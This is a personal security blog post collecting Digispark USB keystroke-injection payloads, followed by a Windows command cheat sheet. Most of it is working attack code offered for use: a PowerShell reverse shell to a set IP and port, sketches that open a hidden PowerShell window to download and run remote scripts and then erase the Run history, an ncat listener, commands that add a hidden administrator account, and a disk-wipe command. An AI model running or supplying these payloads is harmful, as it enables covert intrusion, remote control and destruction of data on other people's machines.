Navigate back to the homepage

Payloads digispark

Ludovic COULON
April 12th, 2020 · 1 min read

Payloads generator for Windows/Linux/Mac

Duck ToolKit

CedArctic/DigiSpark-Scripts

Introduction

thewhiteh4t/flashsploit

Convert DuckyScripts > Digispark

Duckuino

All the payloads that just works 👍

Say something on command line

Tell something with command line interface 🎭

1#include "DigiKeyboard.h"
2void setup() {
3    DigiKeyboard.sendKeyStroke(0);
4  DigiKeyboard.delay(100);
5  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
6  DigiKeyboard.delay(100);
7  DigiKeyboard.print("powershell");
8  DigiKeyboard.sendKeyStroke(KEY_ENTER);
9  DigiKeyboard.delay(3000);
10  DigiKeyboard.print("Add-Type -AssemblyName System.speech");
11  DigiKeyboard.sendKeyStroke(KEY_ENTER);
12  DigiKeyboard.delay(100);
13  DigiKeyboard.print("$speak = New-Object System.Speech.Synthesis.SpeechSynthesizer");
14  DigiKeyboard.sendKeyStroke(KEY_ENTER);
15  DigiKeyboard.delay(100);
16  DigiKeyboard.print("$speak.Speak(\"hello from digispark.\")");
17  DigiKeyboard.sendKeyStroke(KEY_ENTER);
18  DigiKeyboard.delay(100);
19  DigiKeyboard.print("exit");
20  DigiKeyboard.sendKeyStroke(KEY_ENTER);
21  DigiKeyboard.delay(100);
22  DigiKeyboard.sendKeyStroke(KEY_SPACE, MOD_ALT_LEFT);
23  DigiKeyboard.sendKeyStroke(KEY_N);
24}
25
26void loop() {
27}

Create administrator account Reverse shell windows

Reverse shell on windows

First, on the host attacker machine create a php server and upload the payload

1# Start the php server
2sudo php -S 0.0.0.0:80 -t /Users/zeeph/Desktop/
1# Create a file called payload.ps1
2$client=New-Object System.Net.Sockets.TCPClient('192.168.1.90',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
3$sm=(New-Object Net.Sockets.TCPClient('192.168.1.90',1234)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
blog_image
1# Listen all the tcp connexion on port 1234
2ncat -nvlp [PORT]
3
4# Shell spawner linux only !
5python -c 'import pty; pty.spawn("/bin/sh")'
blog_image
1#include "DigiKeyboard.h"
2
3void setup() {
4  DigiKeyboard.update();
5  DigiKeyboard.sendKeyStroke(0);
6  DigiKeyboard.delay(1000);
7  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
8  DigiKeyboard.delay(200);
9  DigiKeyboard.println("powershell -windowstyle hidden -nop \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.90/payload.ps1');\"");
10  DigiKeyboard.delay(1500);
11  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
12  DigiKeyboard.delay(200);
13  DigiKeyboard.println("powershell \"Remove-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU' -Name '*' -ErrorAction SilentlyContinue\"");
14}
15
16void loop() {
17}

Python script with digispark ⚆

1#include "DigiKeyboard.h"
2void setup() {
3  DigiKeyboard.delay(5000);
4  DigiKeyboard.sendKeyStroke(0);
5  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
6  DigiKeyboard.delay(300);
7  DigiKeyboard.print("powershell -windowstyle hidden");
8  DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT + MOD_SHIFT_LEFT);
9  DigiKeyboard.delay(500);
10  DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);
11  DigiKeyboard.delay(100);
12  DigiKeyboard.sendKeyStroke(KEY_ENTER);
13  DigiKeyboard.delay(1000);
14  DigiKeyboard.print("$source = \"http://192.168.1.90/payload.py\"; $destination = \"C:/Documents\"; Invoke-WebRequest $source -OutFile $destination;");
15  DigiKeyboard.sendKeyStroke(KEY_ENTER);
16  DigiKeyboard.delay(5000);
17  DigiKeyboard.print("python C:/Documents/payload.py");
18  DigiKeyboard.sendKeyStroke(KEY_ENTER);
19  digitalWrite(1, HIGH);
20  DigiKeyboard.delay(90000);
21  digitalWrite(1, LOW);
22  DigiKeyboard.delay(5000);
23}
24void loop() {
25}

Useful commands

Windows commands

CMD - Windows commands

The equivalent to the Linux command ; as in

1echo "command 1" ; echo "command 2"

is

1dir & whoami

Dealing with files and stuff

Delete file

1del

Create folder/directory

1md folderName

Show hidden files

1dir /A

Print out file content, like cat

1type file.txt

grep files

1findstr file.txt

Network

Show network information

1netstat -an

Show network adapter info

1ipconfig

Ping another machine

1ping 192.168.1.101

Traceroute

1tracert

Processes

List processes

1tasklist

Kill a process

1taskkill /PID 1532 /F

Users

1net users
2
3# Add user
4net user hacker my_password /add
5net localgroup Administrator hacker /add
6
7# Check if you are part of a domain
8net localgroup /domain
9
10# List all users in a domain
11net users /domain

Other

Shutdown

1# Shutdown now
2shutdown /s /t 0
3
4# Restart
5shutdown /r /t 0

ciper - Clear data/shred

1Shreds the whole machine
2ciper /w:C:\

More articles from Ludovic COULON

Mr Robot CTF

Mr Robot CTF writeup

May 10th, 2020 · 1 min read

Advent of Cyber Challenge - TryHackMe

Advent of Cyber Challenge all the challengs solved write up

May 8th, 2020 · 1 min read
© 2020 Ludovic COULON
Link to $https://github.com/LasCCLink to $https://www.linkedin.com/in/ludovic-coulon-b361ba183/Link to $https://www.youtube.com/channel/UCkDvlI9LUuwZ4GKFUbP_OvgLink to $mailto:coulonludovicc@gmail.com
063664e4.js" async="">rc="/532a2f07-cfef8f2861364f58f9f3.js" async="">height="14" viewBox="0 0 14 14" fill="none" xmlns="http://www.w3.org/2000/svg">Link to $https://github.com/LasCCLink to $https://www.linkedin.com/in/ludovic-coulon-b361ba183/Link to $https://www.youtube.com/channel/UCkDvlI9LUuwZ4GKFUbP_OvgLink to $mailto:coulonludovicc@gmail.com